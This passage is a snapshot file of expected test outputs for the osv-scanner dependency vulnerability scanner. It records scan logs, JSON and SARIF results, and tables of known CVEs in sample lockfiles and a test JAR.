[TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 2] not an exact name for a plugin: "custom/extractor" --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_disabled - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_disabled - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_enabled_and_no_defaults - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_enabled_and_no_defaults - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_different_extractor_enabled - 1] Scanning dir ./testdata/locks-many/composer.lock --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_different_extractor_enabled - 2] No package sources found, --help for usage information. 
--- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_specific_extractor_enabled - 1] Scanning dir ./testdata/locks-many/package-lock.json Scanned /testdata/locks-many/package-lock.json file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_specific_extractor_enabled - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 2] could not determine extractor, requested package-lock.json --- [TestCommand_Filter/Show_all_Packages_with_empty_config - 1] { "results": [ { "source": { "path": "/testdata/locks-insecure/osv-scanner-with-unscannables.json", "type": "lockfile" }, "packages": [ { "package": { "name": "stdlib", "version": "1.999.1", "ecosystem": "Go" } }, { "package": { "name": "toolchain", "version": "1.24.4", "ecosystem": "" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_Filter/Show_all_Packages_with_empty_config - 2] Scanned /testdata/locks-insecure/osv-scanner-with-unscannables.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. 
--- [TestCommand_FlagDeprecatedPackages/package_deprecated_false_no_vuln_json - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_false_no_vuln_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/clean/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/clean/Cargo.lock file and found 5 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_npm_json - 1] { "results": [ { "source": { "path": "/testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "left-pad", "version": "1.3.0", "ecosystem": "npm", "deprecated": true } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_npm_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_json - 1] { "results": [ { "source": { "path": "/testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "url", "version": "2.5.3", "ecosystem": "crates.io", "deprecated": true } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock file and found 36 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_table - 1] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock file and found 36 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. 
+------------------------------------------------------------------------------------------------+ | Deprecated packages | +-----------+---------+---------+----------------------------------------------------------------+ | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-----------+---------+---------+----------------------------------------------------------------+ | crates.io | url | 2.5.3 | testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock | +-----------+---------+---------+----------------------------------------------------------------+ --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_table - 2] --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_json - 1] { "results": [ { "source": { "path": "/testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "net2", "version": "0.2.33", "ecosystem": "crates.io", "deprecated": true }, "groups": 2, "vulnerabilities": [ "RUSTSEC-2020-0016", "RUSTSEC-2020-0078", "GHSA-458v-4hrf-g3m4", "GHSA-c79c-gwph-gqfm" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock file and found 7 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_table - 1] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock file and found 7 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 2 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+---------+---------+---------------+--------------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------+---------+---------------+--------------------------------------------------------------+ | https://osv.dev/RUSTSEC-2020-0016 | | crates.io | net2 | 0.2.33 | -- | testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock | | https://osv.dev/RUSTSEC-2020-0078 | 5.5 | crates.io | net2 | 0.2.33 | 0.2.36 | testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock | | https://osv.dev/GHSA-458v-4hrf-g3m4 | | | | | | | | https://osv.dev/GHSA-c79c-gwph-gqfm | | | | | | | +-------------------------------------+------+-----------+---------+---------+---------------+--------------------------------------------------------------+ Total 1 package deprecated. 
+----------------------------------------------------------------------------------------------+ | Deprecated packages | +-----------+---------+---------+--------------------------------------------------------------+ | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-----------+---------+---------+--------------------------------------------------------------+ | crates.io | net2 | 0.2.33 | testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock | +-----------+---------+---------+--------------------------------------------------------------+ --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_table - 2] --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format - 1] Scanned /testdata/locks-insecure/osv-scanner-flutter-deps.json file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 2 known vulnerabilities (0 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------------------------+ | https://osv.dev/CVE-2023-39137 | 7.8 | GIT | https://github.com/brendan-duncan/archive.git@9de7a054 | -- | testdata/locks-insecure/osv-scanner-flutter-deps.json | | https://osv.dev/CVE-2023-39139 | 7.8 | GIT | https://github.com/brendan-duncan/archive.git@9de7a054 | -- | testdata/locks-insecure/osv-scanner-flutter-deps.json | +--------------------------------+------+-----------+----------------------------------------------------------+---------------+-------------------------------------------------------+ --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format - 2] --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_output_json - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "version": "2.1.0", "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///testdata/locks-insecure/osv-scanner-flutter-deps.json" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "/r/n", "/n" ], "policies": [], "redactionTokens": [], "results": [ { "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": 
"file:///testdata/locks-insecure/osv-scanner-flutter-deps.json" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'https://github.com/brendan-duncan/archive.git@9de7a054' is vulnerable to 'CVE-2023-39137' (also known as 'GHSA-r285-q736-9v95')." }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2023-39137", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///testdata/locks-insecure/osv-scanner-flutter-deps.json" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'https://github.com/brendan-duncan/archive.git@9de7a054' is vulnerable to 'CVE-2023-39139' (also known as 'GHSA-9v85-q87q-g4vg')." }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2023-39139", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "CVE-2023-39137", "GHSA-r285-q736-9v95" ], "fullDescription": { "markdown": "An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.", "text": "An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing." 
}, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2023-39137](https://osv.dev/CVE-2023-39137)**.\n\n## [CVE-2023-39137](https://osv.dev/CVE-2023-39137)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39137\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2023-39137](https://osv.dev/CVE-2023-39137)**.\n\n## [CVE-2023-39137](https://osv.dev/CVE-2023-39137)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore 
them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39137\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2023-39137", "name": "CVE-2023-39137", "properties": { "security-severity": "7.8" }, "relationships": [], "shortDescription": { "markdown": "CVE-2023-39137", "text": "CVE-2023-39137" } }, { "deprecatedIds": [ "CVE-2023-39139", "GHSA-9v85-q87q-g4vg" ], "fullDescription": { "markdown": "An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.", "text": "An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file." 
}, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2023-39139](https://osv.dev/CVE-2023-39139)**.\n\n## [CVE-2023-39139](https://osv.dev/CVE-2023-39139)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39139\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2023-39139](https://osv.dev/CVE-2023-39139)**.\n\n## [CVE-2023-39139](https://osv.dev/CVE-2023-39139)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to 
the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39139\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2023-39139", "name": "CVE-2023-39139", "properties": { "security-severity": "7.8" }, "relationships": [], "shortDescription": { "markdown": "CVE-2023-39139", "text": "CVE-2023-39139" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "properties": {} } --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_output_json - 2] Scanned /testdata/locks-insecure/osv-scanner-flutter-deps.json file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_with_git_tag - 1] Scanned /testdata/locks-insecure/osv-scanner-custom-git-tag.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 40 known vulnerabilities (5 Critical, 15 High, 20 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------------+------+-----------+----------------------------+---------------+---------------+---------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+---------------+---------------+---------------------------------------------------------+ | https://osv.dev/CVE-2016-2177 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2016-2182 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-2274 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-3358 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-3996 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-4203 | 4.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-4304 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-4450 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0215 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0216 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0217 | 7.5 
| GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0286 | 7.4 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0401 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0464 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0465 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0466 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-1255 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-2650 | 6.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-2975 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-3817 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-4807 | 7.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-5363 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-5678 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-6129 | 
6.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-6237 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-13176 | 4.1 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-2511 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-4603 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-4741 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-5535 | 9.1 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-9143 | 4.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-15467 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-68160 | 4.7 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-69418 | 4.0 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-69419 | 7.4 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-69420 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | 
https://osv.dev/CVE-2025-9230 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2026-22795 | 5.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2026-22796 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | +--------------------------------+------+-----------+----------------------------+---------------+---------------+---------------------------------------------------------+ --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_with_git_tag - 2] --- [TestCommand_HtmlFile - 1] --- [TestCommand_HtmlFile - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml HTML output available at: /report.html --- [TestCommand_HtmlFile_Deprecated - 1] --- [TestCommand_HtmlFile_Deprecated - 2] Warning: --output has been deprecated in favor of --output-file Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml HTML output available at: /report.html --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis - 1] Scanning dir ./testdata/artifact/javareach_test.jar Java reachability enricher marked 14 packages as unreachable Scanned /testdata/artifact/javareach_test.jar file and found 21 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. failed to download package err jar not found: https://repo1.maven.org/maven2/com/example/hello-tester/1.0-SNAPSHOT/hello-tester-1.0-SNAPSHOT.jar Total 4 packages affected by 55 known vulnerabilities (18 Critical, 30 High, 5 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 55 vulnerabilities can be fixed. +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-72hv-8253-57qq | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.18.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h46c-h94j-95f3 | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.15.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-288c-cq4h-88gq | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4gq5-ch57-c2mg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4w82-r329-3q67 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 
